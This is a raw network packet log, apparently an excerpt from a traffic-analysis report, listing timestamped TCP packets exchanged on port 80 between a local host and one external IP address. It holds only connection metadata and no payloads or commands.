                                                                                                                                                                Feb 22, 2021 07:46:00.663921118 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.663957119 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.663980007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664005995 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664019108 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.664036989 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664050102 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.664067984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664155960 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.664887905 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664922953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664943933 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664964914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664983988 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.664995909 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.665023088 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665054083 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.665083885 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.665817022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665852070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665877104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665894985 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.665920019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665942907 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665961027 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.665983915 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.666011095 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.688524008 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688560009 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688580036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688601017 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688621044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688633919 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.688658953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688682079 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.688704967 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.688889980 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688915014 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688939095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688961029 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.688982010 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.688997030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.689017057 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.689034939 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.689073086 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.689832926 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.689861059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.689922094 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.995132923 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995162010 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995177984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995196104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995210886 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995229959 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995246887 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.995286942 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.995492935 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995523930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995541096 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995557070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995565891 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.995580912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995595932 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.995605946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.995646954 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:00.996444941 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.996467113 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:00.996529102 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006067038 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006098986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006119013 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006139994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006160975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006181955 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006201982 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006254911 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006273031 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006484985 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006510019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006531000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006551981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006561995 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006582022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006598949 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.006612062 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.006664991 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.007422924 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.007448912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.007518053 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.309168100 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309199095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309216976 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309232950 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309251070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309267044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309324026 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.309380054 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.309521914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309540033 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309560061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309576988 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309593916 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309611082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.309617043 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.309655905 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.310470104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.310492039 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.310549974 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.316948891 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.316978931 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.316993952 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317091942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317106962 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.317109108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317128897 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317138910 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.317147970 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317166090 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317181110 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.317182064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.317235947 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.318057060 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.318082094 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.318098068 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.318115950 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.318131924 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.318131924 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.318192005 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.330481052 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330507994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330523968 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330631971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330651999 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330672026 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330686092 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.330692053 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330708981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330725908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.330748081 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.330779076 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.331619024 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331641912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331659079 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331676006 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331685066 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.331692934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331707954 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.331757069 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.340820074 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340847015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340859890 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340873003 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340888023 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340909004 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.340958118 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.341032982 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.341188908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341207981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341226101 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341242075 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341247082 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.341263056 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341280937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.341315031 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.341361046 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.342133999 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.342154980 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.342168093 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.342185020 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.342200994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.342212915 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.342253923 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.357481003 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357506990 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357521057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357533932 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357551098 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357567072 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357618093 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.357642889 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.357741117 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357759953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357774973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357791901 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357809067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357821941 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.357829094 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.357865095 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.357875109 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.358705997 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358742952 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358756065 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358768940 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358783007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358820915 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.358870029 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.358911991 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.358956099 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.359646082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367074966 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367108107 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367125034 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367141962 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367158890 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367161989 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.367177963 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367183924 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.367234945 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.367372036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367392063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367408991 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367418051 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.367425919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367445946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367455006 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.367463112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.367508888 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.368386030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.368412971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.368428946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.368446112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.368454933 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.368459940 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.368495941 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.368530035 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.679975986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680016994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680041075 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680063009 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680083036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680103064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680124044 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.680170059 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.680304050 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680342913 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.680386066 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.683845043 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.688723087 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688750029 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688767910 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688787937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688805103 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688816071 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.688822031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.688859940 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.688884974 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.689168930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689188957 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689204931 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689224005 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689241886 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689260960 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.689279079 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.689311981 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.690124989 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.690149069 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.690166950 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.690181971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.690234900 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.695512056 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695540905 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695558071 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695574045 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695590973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695605993 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695651054 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.695693016 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.695919991 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695939064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695955992 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695974112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695988894 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.695998907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.696006060 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696052074 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.696897984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696924925 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696943045 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696959019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696974993 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.696991920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.697000027 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.697046995 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.697855949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702342033 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702366114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702379942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702393055 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702411890 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702424049 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702471972 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.702513933 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.702718973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702739954 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702758074 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702775002 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702780962 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:01.702790976 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702802896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:01.702822924 CET4972680192.168.2.5104.21.71.230
